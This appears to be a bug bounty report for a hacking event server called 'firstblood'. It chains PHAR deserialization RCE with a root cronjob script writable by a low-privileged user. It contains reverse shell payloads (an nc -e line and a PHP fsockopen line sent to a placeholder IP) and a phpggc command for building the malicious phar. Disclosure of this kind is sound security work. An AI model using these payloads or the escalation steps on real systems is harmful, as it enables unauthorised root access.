BugBountyHunter

Hey, I would like to report that it's possible to get root user on firstblood server, due to some insecure cronjobs running by root user and user fb-exec have write permission over it, and low privilge user can escalate to root by abusing it.

• As i mentioned in report (https://www.bugbountyhunter.com/hackevents/report?id=622), that it is possible to get RCE due to insecure deserialization by adding the phar:// stream handler to the path of proof uploaded.

steps:

1. Upload a malicious generated phar file on server with payload.

   nc -e /bin/bash <YOUR_IP> <PORT>

   ./phpggc -pj test.jpg -o test.phar monolog/rce1 system "nc -e /bin/bash <ip> <port>

2. Upload this file on server, and capture the proof request, and append phar:// stream to path.

3. Have your listener ready and send the request.

   

4. Now let's do some recon we find another directory inside /app named docker.

   

5. Inside it we find that cronjob is running on server

   

6. Let's see what that scheduler.php script is

   

7. And fb-exec user have write permission over that file.

   Uhhh here we go again, Patrcie!

8. Let's put our php reverse shell in this scheduler.php file, and start a listener on other port on our local machine,

     echo '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");' >> scheduler.php

9. Now wait for a moment and , and you will get shell as root user.

   

Impact:

• Firstblooded

  

Thank you & sorry for little meme i hope that's ok :)

Regards newrouge